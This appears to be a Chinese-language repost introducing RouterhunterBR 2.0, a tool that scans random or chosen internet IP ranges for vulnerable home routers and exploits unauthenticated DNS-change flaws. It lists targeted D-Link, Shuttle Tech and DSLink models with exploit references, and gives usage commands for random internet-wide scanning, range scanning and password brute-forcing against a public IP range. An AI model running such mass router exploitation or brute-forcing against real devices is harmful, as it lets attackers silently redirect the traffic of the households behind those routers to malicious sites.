RouterhunterBR 2.0 － 路由器漏洞自动化扫描工具

项目地址

https://github.com/jh00nbr/Routerhunter-2.0

项目简介

RouterhunterBR是一个自动化的漏洞发现工具，并支持对互联网上的路由器和易受攻击的设备进行测试。RouterhunterBR可以对自定义的IP或随机的IP进行扫描，以自动利用在家用路由器漏洞DNSChanger。

DNSChanger是一个木马能够直接用户请求非法网站。在实践中，这是恶意软件必须改变我们的机器的用户重定向到站点恶意目的的DNS设置的能力。想象一下，例如，您的系统是否感染了这种恶意软件，可能会发生什么是用户访问特定网站（如：Facebook.com）可能会被转发到一个不请自来的网站，并可能违法。

支持的漏洞列表

• Shuttle Tech ADSL Modem-Router 915 WM / Unauthenticated Remote DNS Change Exploit
  reference: http://www.exploit-db.com/exploits/35995/
• D-Link DSL-2740R / Unauthenticated Remote DNS Change Exploit
  reference: http://www.exploit-db.com/exploits/35917/
• D-Link DSL-2640B Unauthenticated Remote DNS Change Exploit
  reference: http://1337day.com/exploit/23302/
• D-Link DSL-2780B DLink_1.01.14 – Unauthenticated Remote DNS Change
  reference: https://www.exploit-db.com/exploits/37237/
• D-Link DSL-2730B AU_2.01 – Authentication Bypass DNS Change
  reference: https://www.exploit-db.com/exploits/37240/
• D-Link DSL-526B ADSL2+ AU_2.01 – Unauthenticated Remote DNS Change
  reference: https://www.exploit-db.com/exploits/37241/
• DSLink 260E – Authenticated routers – DNS Changer – Bruteforce reference: https://www.youtube.com/watch?v=tNjy91g2Rak
  http://blog.inurl.com.br/2015/03/dslink-260e-defaut-passwords-dns-change_17.html

使用方法

随机IP扫描

python routerhunter.py –dns1 8.8.8.8 –dns2 8.8.4.8 –randomip –limitip 10 –threads 10

python routerhunter.py –dns1 8.8.8.8 –dns2 8.8.4.8 -rip -lmtip 10 –threads 10

IP段扫描

python routerhunter.py –dns1 8.8.8.8 –dns2 8.8.4.8 –range 192.168.25.0-255 –threads 10

特殊IP段扫描

python routerhunter.py –dns1 8.8.8.8 –dns2 8.8.4.8 –startip 192.168.*.* –endip 192.168.*.* –threads 10

暴力破解帐号密码

python routerhunter.py –dns1 8.8.8.8 –dns2 8.8.4.4 –range 177.106.19.65-70 –bruteforce –threads 10